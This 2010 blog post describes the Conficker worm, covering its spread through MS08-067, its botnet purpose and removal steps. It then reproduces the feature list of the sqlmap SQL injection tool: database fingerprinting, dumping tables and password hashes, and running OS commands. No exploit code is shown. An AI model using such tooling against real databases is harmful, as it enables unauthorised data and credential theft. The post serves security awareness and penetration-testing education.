Monday, April 5, 2010

Conficker Computer Worm


Decades biggest hackers innovation were Bots, and the biggest among was Conficker. Conficker was predicted by mian stream press as the work that would destroy the internet. But though it did not destroy the internet it with packing state-of-the-art encryption, and sophisticated peer-to-peer update mechanism, Conficker tantalized security researchers and resisted attempts at eradication, inhabiting at its peak as many as 15 million unpatched Windows boxes, mostly in China and Brazil.
The Conficker worm is a  computer worm that can infect your computer and spread itself to other computers across a network automatically, without human interaction.Experts thought it’s the work of an organized team of coders, and there are hints that it originated in Ukraine. And like most of the hacking out of Eastern Europe, the software has a profit motive: It’s been seen sending spam, and serving victims a fake anti-virus product that offers to remove malware for $49.95. Dude. It used to be about the mayhem.
Here are some information that worth to stay safe from the Downadup worm. I found these information on Norton website and thought worth sharing.
The Conficker worm, sometimes called Downadup or Kido has managed to infect a large number of computers. Specifics are hard to come by, but some researchers estimate that millions of computers have been infected with this threat since January 2009.  If you are unable to reach your Security suite web site, you may be infected. In that case you will need to get to a computer that is not infected, download specialized Conficker removal tool and run it on the infected machine before installing new antivirus software. Symantec has a detailed technical analysis of the threat.
youtube=http://www.youtube.com/watch?v=r2h6w61-c74

What does the Conficker worm do?

The Conficker worm has created secure infrastructure for cybercrime. The worm allows its creators to remotely install software on infected machines. What will that software do? We don’t know. Most likely the worm will be used to create a botnet that will be rented out to criminals who want to send SPAM, steal IDs and direct users to online scams and phishing sites.
The Conficker worm mostly spreads across networks. If it finds a vulnerable computer, it turns off the automatic backup service, deletes previous restore points, disables many security services, blocks access to a number of security web sites and opens infected machines to receive additional programs from the malware’s creator. The worm then tries to spread itself to other computers on the same network.

How does the worm infect a computer?

The Downadup worm tries to take advantage of a problem with Windows (a vulnerability) called MS08-067 to quietly install itself. Users who automatically receive updates from Microsoft are already protected from this. The worm also tries to spread by copying itself into shared folders on networks and by infecting USB devices such as memory sticks.

Who is at risk?

Users whose computers are not configured to receive patches and updates from Microsoft and who are not running an up to date antivirus product are most at risk. Users who do not have a genuine version of Windows from Microsoft are most at risk since pirated system usually cannot get Microsoft updates and patches.

What to do if you are infected

If you are reading this page, your computer is probably not infected with Conficker as the worm blocks access to most security web sites.
If you have a computer that is infected, you will need to use an uninfected computer to download a specialized Conficker removal tool from. The tool is available here:
Or, you can restore access to security web sites on an infected machine by taking the following steps:
  1. Click Start > Run.
  2. In the Run box, type the following: cmd
  3. Click OK.
  4. Type the following and then press Enter. cd..
  5. Repeat the previous step until you get to the root level, or C:\>. Note that if your root drive is not C, the letter will be different.
  6. At C:\> type the following: net stop dnscache
  7. Press Enter. This disables the domain blocking feature of Conficker and you should now be able to reach security Web sites including ours. 
You should now be able to download the Conficker removal tool here.

    SQL Map Open source Pen Test tool

    sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers. It comes with a broad range of features lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

    [youtube=http://www.youtube.com/watch?v=EVjonzEWOVw]

    sqlmap features

    Features implemented in sqlmap include:

    Generic features

    • Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server back-end database management systems. Besides these four database management systems software, sqlmap can also identify Microsoft Access, DB2, Informix, Sybase and Interbase.
    • Full support for three SQL injection techniques: inferential blind SQL injection, UNION query (inband) SQL injection and batched queries support. sqlmap can also test for time based blind SQL injection.
    • It is possible to provide a single target URL, get the list of targets from Burp proxy requests log file or WebScarab proxy conversations/ folder, get the whole HTTP request from a text file or get the list of targets by providing sqlmap with a Google dork which queries Google search engine and parses its results page. You can also define a regular-expression based scope that is used to identify which of the parsed addresses to test.
    • Automatically tests all provided GET parameters, POST parameters, HTTP Cookie header values and HTTP User-Agent header value to find the dynamic ones, which means those that vary the HTTP response page content. On the dynamic ones sqlmap automatically tests and detects the ones affected by SQL injection. Each dynamic parameter is tested for numeric, single quoted string, double quoted string and all of these three data-types with zero to two parenthesis to correctly detect which is the SELECT statement syntax to perform further injections with. It is also possible to specify the only parameter(s) that you want to perform tests and use for injection on.
    • Option to specify the maximum number of concurrent HTTP requests to speed up the inferential blind SQL injection algorithms (multi-threading). It is also possible to specify the number of seconds to wait between each HTTP request.
    • HTTP Cookie header string support, useful when the web application requires authentication based upon cookies and you have such data or in case you just want to test for and exploit SQL injection on such header. You can also specify to always URL-encode the Cookie header.
    • Automatically handle HTTP Set-Cookie header from the application, re-establishing of the session if it expires. Test and exploit on these values is supported too. You can also force to ignore any Set-Cookie header.
    • HTTP Basic, Digest, NTLM and Certificate authentications support.
    • Anonymous HTTP proxy support to pass by the requests to the target application that works also with HTTPS requests.
    • Options to fake the HTTP Referer header value and the HTTP User-Agent header value specified by user or randomly selected from a text file.
    • Support to increase the verbosity level of output messages: there exist six levels. The default level is 1 in which information, warnings, errors and tracebacks (if any occur) will be shown.
    • Granularity in the user’s options.
    • Estimated time of arrival support for each query, updated in real time while fetching the information to give to the user an overview on how long it will take to retrieve the output.
    • Automatic support to save the session (queries and their output, even if partially retrieved) in real time while fetching the data on a text file and resume the injection from this file in a second time.
    • Support to read options from a configuration INI file rather than specify each time all of the options on the command line. Support also to save command line options on a configuration INI file.
    • Option to update sqlmap as a whole to the latest development version from the Subversion repository.
    • Integration with other IT security open source projects, Metasploit and w3af.

    [youtube=http://www.youtube.com/watch?v=NFmAdluw4GI&feature=related]

    Fingerprint and enumeration features

    • Extensive back-end database software version and underlying operating system fingerprint based upon inband error messages, banner parsing, functions output comparison and specific features such as MySQL comment injection. It is also possible to force the back-end database management system name if you already know it.
    • Basic web server software and web application technology fingerprint.
    • Support to retrieve the DBMS banner, session user and current database information. The tool can also check if the session user is a database administrator (DBA).
    • Support to enumerate database users, users’ password hashes, users’ privileges, databases, tables and columns.
    • Support to dump database tables as a whole or a range of entries as per user’s choice. The user can also choose to dump only specific column(s).
    • Support to automatically dump all databases’ schemas and entries. It is possibly to exclude from the dump the system databases.
    • Support to enumerate and dump all databases’ tables containing user provided column(s). Useful to identify for instance tables containing custom application credentials.
    • Support to run custom SQL statement(s) as in an interactive SQL client connecting to the back-end database. sqlmap automatically dissects the provided statement, determines which technique to use to inject it and how to pack the SQL payload accordingly.

    Download:

    Click here to download